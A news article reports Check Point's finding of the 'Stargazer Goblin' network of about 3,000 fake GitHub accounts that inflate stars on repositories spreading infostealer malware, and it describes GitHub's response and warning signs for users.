A secret network of around 3,000 “ghost” accounts on GitHub has been found operating the code-hosting platform to promote malware and phishing links. A recent investigation by cybersecurity firm Check Point uncovered the activities of a cybercriminal group that researchers have dubbed “Stargazer Goblin.”
Stargazer Goblin has been active on Microsoft-owned GitHub, the world’s largest open-source code repository, since June 2023, or even before. The site hosts millions of developers’ projects, and Stargazer Goblin has used community tools to increase visibility and legitimacy for its malicious code repositories.
Antonis Telefos, the malware reverse engineer at Check Point who discovered the network, highlighted the sophistication of the operation, noting that while GitHub has been targeted by cybercriminals before, the scale and method of this operation is unprecedented.
The repositories and stars are bought and sold through cybercrime-related Telegram channels and various criminal marketplaces. Telegram is commonly used by cybercriminals, their clients and victims. Telefos said he has not seen such a network of fake accounts operating on GitHub.
Check Point’s Stargazers Ghost Network distributes malware disguised as legitimate tools for social media, gaming and cryptocurrency applications, including code to run a VPN or license software such as Adobe Photoshop. These repositories target Windows users looking for free software online.
The network charges other hackers a fee for its services. Check Point identified various types of malware distributed through this network, including Atlantida Stealer, Rhadamanthys, and Lumma Stealer. Terefos discovered the network while investigating instances of Atlantida Stealer.
Stargazer Goblin advertises on cybercrime forums and has a Telegram channel offering 100 stars for $10 and 50 stars for $50. It also clones existing repositories and provides trusted accounts. According to Check Point’s research, the network may have raised up to $100,000 since it began these operations as early as August 2022. Between mid-May and mid-June of this year alone, the operator reportedly made around $8,000.
Terefos has observed legitimate repositories being hijacked and converted into malicious repositories using stolen credentials. If legitimate users fork these compromised repositories, the malicious code can spread further. Automated tools help Terefos identify accounts linked to the network by recognizing common characteristics such as similar templates and tags.
When GitHub identifies accounts that support illegal malware campaigns, it disables the user accounts for violating GitHub’s terms of service. Alexis Wales, GitHub’s vice president of security operations, said the company has dedicated teams to detect and remove such content and accounts. These teams use a combination of manual review and large-scale detection using machine learning to identify suspicious behavior.
Unfortunately, GitHub is a huge target with over 100 million users and 420 million repositories, so it’s not that hard for cybercriminals to hide within the user base like grains of sand on a beach.
Jake Moore, global cybersecurity advisor at security firm Eset, warned GitHub users about the risks of downloading malicious code: Signs of a malicious repository include unexpected code changes, code that accesses external resources, and hard-coded credentials or API keys.
The Stargazer Goblin network may be even more widespread, as evidenced by YouTube accounts sharing malicious links through their videos, and Terefos stresses that the full extent of the network’s activities is not yet fully understood.
